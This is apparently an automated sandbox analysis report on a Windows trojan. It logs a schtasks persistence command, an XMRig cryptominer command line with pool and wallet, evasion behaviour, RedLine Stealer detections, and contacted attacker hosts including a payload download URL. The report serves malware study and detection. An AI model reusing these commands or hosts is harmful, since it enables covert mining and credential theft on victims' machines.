Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Process created: C:\Users\user\AppData\Local\zmql3v0y.exe 'C:\Users\user\AppData\Local\zmql3v0y.exe'
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 1 /tn 'Windows Service Microsoft Corporation' /tr 'C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe' /f
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process created: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe 'C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe' -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1
Source: cpu.exe, 00000010.00000002.547811557.0000020FCC7B0000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.534797835.000001F5082A0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: cpu.exe, 00000010.00000002.547811557.0000020FCC7B0000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.534797835.000001F5082A0000.00000002.00000001.sdmp Binary or memory string: Progman
Source: cpu.exe, 00000010.00000002.547811557.0000020FCC7B0000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.534797835.000001F5082A0000.00000002.00000001.sdmp Binary or memory string: SProgram Managerl
Source: cpu.exe, 00000010.00000002.547811557.0000020FCC7B0000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.534797835.000001F5082A0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd,
Source: cpu.exe, 00000010.00000002.547811557.0000020FCC7B0000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.534797835.000001F5082A0000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected RedLine Stealer
Source: Yara match File source: 00000004.00000003.274701180.00000000008A0000.00000004.00000001.sdmp, type: MEMORY
Yara detected Credential Stealer
Source: Yara match File source: 00000004.00000003.274701180.00000000008A0000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected RedLine Stealer
Source: Yara match File source: 00000004.00000003.274701180.00000000008A0000.00000004.00000001.sdmp, type: MEMORY

Behavior Graph:

Behavior Graph ID: 356837 Sample: SecuriteInfo.com.Trojan.Gen... Startdate: 23/02/2021 Architecture: WINDOWS Score: 100

Top-level DNS/IP: api.ip.sb; whois.iana.org; 2 other IPs or domains
Top-level signatures: Sigma detected: Xmrig; Found malware configuration; Antivirus detection for URL or domain; 10 other signatures

Process: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe (started)
  DNS/IP: iplogger.org 88.99.66.31, 443, 49719, 49730 HETZNER-ASDE Germany; pastebin.com 104.23.99.190, 443, 49720 CLOUDFLARENETUS United States; blog.agencia10x.com 172.67.213.210, 443, 49721 CLOUDFLARENETUS United States
  Dropped: C:\Users\user\AppData\Local\zmql3v0y.exe, PE32; C:\Users\user\AppData\Local\pg2bsuqa.exe, PE32; SecuriteInfo.com.T...54886.17334.exe.log, ASCII
  Signatures: Detected unpacking (changes PE section rights); Query firmware table information (likely to detect VMs); Hides threads from debuggers
  Starts: zmql3v0y.exe; pg2bsuqa.exe

Process: RantimeBroker.exe (two instances started)
  Signatures: Multi AV Scanner detection for dropped file; Tries to detect sandboxes and other dynamic analysis tools (window names); Tries to detect sandboxes / dynamic malware analysis system (registry check)

Process: zmql3v0y.exe (started by the sample)
  DNS/IP: 195.2.84.91, 49729, 80 ZENON-ASMoscowRussiaRU Russian Federation; iplogger.org
  Dropped: C:\Users\user\AppData\...\RantimeBroker.exe, PE32; C:\Users\user\AppData\Roaming\...\cpu.exe, PE32+; C:\Users\user\AppData\...\WinRing0x64.sys, PE32+; C:\Users\user\AppData\Roaming\...\config.json, ASCII
  Signatures: Multi AV Scanner detection for dropped file; Detected unpacking (changes PE section rights); Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); 3 other signatures
  Starts: cpu.exe; schtasks.exe

Process: pg2bsuqa.exe (started by the sample)
  Signatures: Query firmware table information (likely to detect VMs); Machine Learning detection for dropped file; Tries to detect virtualization through RDTSC time measurements

Process: cpu.exe (started by zmql3v0y.exe)
  DNS/IP: pool.minexmr.com 88.99.193.240, 4444, 49731 HETZNER-ASDE Germany (Detected Stratum mining protocol)
  Signatures: Multi AV Scanner detection for dropped file; Query firmware table information (likely to detect VMs)
  Starts: conhost.exe

Process: schtasks.exe (started by zmql3v0y.exe)
  Starts: conhost.exe

Contacted Public IPs

IP              Domain   Country             ASN    ASN Name                 Malicious
104.23.99.190   unknown  United States       13335  CLOUDFLARENETUS          false
88.99.66.31     unknown  Germany             24940  HETZNER-ASDE             false
195.2.84.91     unknown  Russian Federation  6903   ZENON-ASMoscowRussiaRU   false
172.67.213.210  unknown  United States       13335  CLOUDFLARENETUS          false
88.99.193.240   unknown  Germany             24940  HETZNER-ASDE             false

Contacted Domains

Name IP Active
ianawhois.vip.icann.org 192.0.47.59 true
blog.agencia10x.com 172.67.213.210 true
iplogger.org 88.99.66.31 true
WHOIS.RIPE.NET 193.0.6.135 true
pool.minexmr.com 88.99.193.240 true
pastebin.com 104.23.99.190 true
api.ip.sb unknown unknown
whois.iana.org unknown unknown

Contacted URLs

Name                         Malicious  Antivirus Detection    Reputation
http://195.2.84.91/cpu.zip   false      Avira URL Cloud: safe  unknown